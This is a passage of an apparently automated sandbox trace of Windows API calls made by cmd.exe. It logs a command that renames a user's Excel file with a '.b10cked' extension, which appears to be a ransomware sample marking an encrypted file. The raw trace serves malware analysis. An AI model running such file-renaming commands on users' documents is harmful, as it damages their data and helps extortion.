hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0128.792] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.792] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0128.792] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.792] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0128.793] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.793] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0128.793] GetEnvironmentStringsW () returned 0x2e0238* [0128.793] FreeEnvironmentStringsW (penv=0x2e0238) returned 1 [0128.793] GetEnvironmentStringsW () returned 0x2e0238* [0128.793] FreeEnvironmentStringsW (penv=0x2e0238) returned 1 [0128.793] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e93c | out: phkResult=0x26e93c*=0x40) returned 0x0 [0128.793] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x0, lpData=0x26e948*=0xc8, lpcbData=0x26e940*=0x1000) returned 0x2 [0128.793] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x4, lpData=0x26e948*=0x1, lpcbData=0x26e940*=0x4) returned 0x0 [0128.793] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x0, lpData=0x26e948*=0x1, lpcbData=0x26e940*=0x1000) returned 0x2 [0128.793] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x4, lpData=0x26e948*=0x0, lpcbData=0x26e940*=0x4) returned 0x0 [0128.793] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x4, lpData=0x26e948*=0x40, lpcbData=0x26e940*=0x4) returned 0x0 [0128.793] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x4, lpData=0x26e948*=0x40, lpcbData=0x26e940*=0x4) returned 0x0 [0128.793] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x0, lpData=0x26e948*=0x40, lpcbData=0x26e940*=0x1000) returned 0x2 [0128.793] RegCloseKey (hKey=0x40) returned 0x0 [0128.793] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e93c | out: phkResult=0x26e93c*=0x40) returned 0x0 [0128.793] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x0, lpData=0x26e948*=0x40, lpcbData=0x26e940*=0x1000) returned 0x2 [0128.793] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x4, lpData=0x26e948*=0x1, lpcbData=0x26e940*=0x4) returned 0x0 [0128.793] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x0, lpData=0x26e948*=0x1, lpcbData=0x26e940*=0x1000) returned 0x2 [0128.794] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x4, lpData=0x26e948*=0x0, lpcbData=0x26e940*=0x4) returned 0x0 [0128.794] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x4, lpData=0x26e948*=0x9, lpcbData=0x26e940*=0x4) returned 0x0 [0128.794] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x4, lpData=0x26e948*=0x9, lpcbData=0x26e940*=0x4) returned 0x0 [0128.794] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e944, lpData=0x26e948, lpcbData=0x26e940*=0x1000 | out: lpType=0x26e944*=0x0, lpData=0x26e948*=0x9, lpcbData=0x26e940*=0x1000) returned 0x2 [0128.794] RegCloseKey (hKey=0x40) returned 0x0 [0128.794] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886363 [0128.794] srand (_Seed=0x5b886363) [0128.794] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked\"" [0128.794] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked\"" [0128.794] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.794] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e1998, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0128.794] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.794] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.794] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.794] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0128.794] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0128.794] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0128.794] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0128.794] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0128.794] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0128.794] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0128.794] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0128.794] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0128.795] GetEnvironmentStringsW () returned 0x2e2388* [0128.795] FreeEnvironmentStringsW (penv=0x2e2388) returned 1 [0128.795] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.795] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.795] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0128.795] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0128.795] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0128.795] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0128.795] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0128.795] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0128.795] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0128.795] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0128.795] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f708 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.795] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f708, lpFilePart=0x26f704 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f704*="Desktop") returned 0x18 [0128.795] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0128.795] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f484 | out: lpFindFileData=0x26f484) returned 0x2e0a18 [0128.795] FindClose (in: hFindFile=0x2e0a18 | out: hFindFile=0x2e0a18) returned 1 [0128.795] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f484 | out: lpFindFileData=0x26f484) returned 0x2e0a18 [0128.795] FindClose (in: hFindFile=0x2e0a18 | out: hFindFile=0x2e0a18) returned 1 [0128.796] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f484 | out: lpFindFileData=0x26f484) returned 0x2e0a18 [0128.796] FindClose (in: hFindFile=0x2e0a18 | out: hFindFile=0x2e0a18) returned 1 [0128.796] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0128.796] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0128.796] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0128.796] GetEnvironmentStringsW () returned 0x2e0238* [0128.796] FreeEnvironmentStringsW (penv=0x2e0238) returned 1 [0128.796] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.796] GetConsoleOutputCP () returned 0x1b5 [0128.796] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0128.796] GetUserDefaultLCID () returned 0x409 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f848, cchData=128 | out: lpLCData="0") returned 2 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f848, cchData=128 | out: lpLCData="0") returned 2 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f848, cchData=128 | out: lpLCData="1") returned 2 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0128.797] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0128.798] GetConsoleTitleW (in: lpConsoleTitle=0x2d0948, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.798] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0128.798] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0128.798] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0128.798] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0128.799] _wcsicmp (_String1="move", _String2=")") returned 68 [0128.799] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0128.799] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0128.799] _wcsicmp (_String1="IF", _String2="move") returned -4 [0128.799] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0128.799] _wcsicmp (_String1="REM", _String2="move") returned 5 [0128.799] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0128.803] GetConsoleTitleW (in: lpConsoleTitle=0x26f540, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.803] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0128.803] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0128.803] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0128.803] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0128.803] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0128.803] _wcsicmp (_String1="move", _String2="CD") returned 10 [0128.803] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0128.803] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0128.803] _wcsicmp (_String1="move", _String2="REN") returned -5 [0128.803] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0128.803] _wcsicmp (_String1="move", _String2="SET") returned -6 [0128.803] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0128.803] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0128.803] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0128.803] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0128.803] _wcsicmp (_String1="move", _String2="MD") returned 11 [0128.803] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0128.803] _wcsicmp (_String1="move", _String2="RD") returned -5 [0128.803] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0128.803] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0128.803] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0128.803] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0128.804] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0128.804] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0128.804] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0128.804] _wcsicmp (_String1="move", _String2="VER") returned -9 [0128.804] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0128.804] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0128.804] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0128.804] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0128.804] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0128.804] _wcsicmp (_String1="move", _String2="START") returned -6 [0128.804] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0128.804] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0128.804] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0128.805] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0128.805] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0128.805] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f2fc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f2f4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f2f4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0128.805] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0128.805] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0128.805] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0128.805] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.805] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0128.806] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0128.806] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0128.806] _wcsicmp (_String1="CFAWII~1.XLS", _String2=".") returned 53 [0128.806] _wcsicmp (_String1="CFAWII~1.XLS", _String2="..") returned 53 [0128.807] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\cfawii~1.xls")) returned 0x20 [0128.807] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2e20b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.807] SetErrorMode (uMode=0x0) returned 0x0 [0128.807] SetErrorMode (uMode=0x1) returned 0x0 [0128.807] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS", nBufferLength=0x104, lpBuffer=0x26ec84, lpFilePart=0x26ec6c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS", lpFilePart=0x26ec6c*="CFAWII~1.XLS") returned 0x3f [0128.807] SetErrorMode (uMode=0x0) returned 0x1 [0128.807] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1")) returned 0x10 [0128.807] _wcsicmp (_String1="CFAWII~1.XLS", _String2=".") returned 53 [0128.807] _wcsicmp (_String1="CFAWII~1.XLS", _String2="..") returned 53 [0128.807] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\cfawii~1.xls")) returned 0x20 [0128.807] SetErrorMode (uMode=0x0) returned 0x0 [0128.807] SetErrorMode (uMode=0x1) returned 0x0 [0128.807] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS", nBufferLength=0x104, lpBuffer=0x26f100, lpFilePart=0x26ee98 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS", lpFilePart=0x26ee98*="CFAWII~1.XLS") returned 0x3f [0128.807] SetErrorMode (uMode=0x0) returned 0x1 [0128.807] SetErrorMode (uMode=0x0) returned 0x0 [0128.807] SetErrorMode (uMode=0x1) returned 0x0 [0128.807] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x26f308, lpFilePart=0x26ee98 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked", lpFilePart=0x26ee98*="Cf aWIIkKxWa7MD7fCc.xlsx.b10cked") returned 0x53 [0128.807] SetErrorMode (uMode=0x0) returned 0x1 [0128.807] SetLastError (dwErrCode=0x0) [0128.808] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\cf awiikkxwa7md7fcc.xlsx.b10cked")) returned 0xffffffff [0128.808] GetLastError () returned 0x2 [0128.808] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x26e814, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e814) returned 0x2e22c0 [0128.808] FindNextFileW (in: hFindFile=0x2e22c0, lpFindFileData=0x26e814 | out: lpFindFileData=0x26e814) returned 0 [0128.808] GetLastError () returned 0x12 [0128.808] FindClose (in: hFindFile=0x2e22c0 | out: hFindFile=0x2e22c0) returned 1 [0128.809] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x2e1e50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2e1e50) returned 0x2e22c0 [0128.810] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x26eaac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked", lpFilePart=0x0) returned 0x53 [0128.810] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx", nBufferLength=0x104, lpBuffer=0x26eaac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx", lpFilePart=0x0) returned 0x4b [0128.810] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\cf awiikkxwa7md7fcc.xlsx")) returned 0x20 [0128.810] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\cf awiikkxwa7md7fcc.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\cf awiikkxwa7md7fcc.xlsx.b10cked"), dwFlags=0x3) returned 1 [0128.810] FindClose (in: hFindFile=0x2e22c0 | out: hFindFile=0x2e22c0) returned 1 [0128.810] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26ea60 | out: _Buffer=" 1") returned 9 [0128.810] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.810] GetFileType (hFile=0x7) returned 0x2 [0128.816] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0128.816] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26e9ec | out: lpMode=0x26e9ec) returned 1 [0128.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.816] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26ea20 | out: lpConsoleScreenBufferInfo=0x26ea20) returned 1 [0128.816] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0128.816] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26ea60 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0128.817] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 